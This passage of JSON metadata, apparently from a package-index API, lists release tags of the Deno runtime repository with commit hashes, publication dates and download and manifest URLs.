d56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10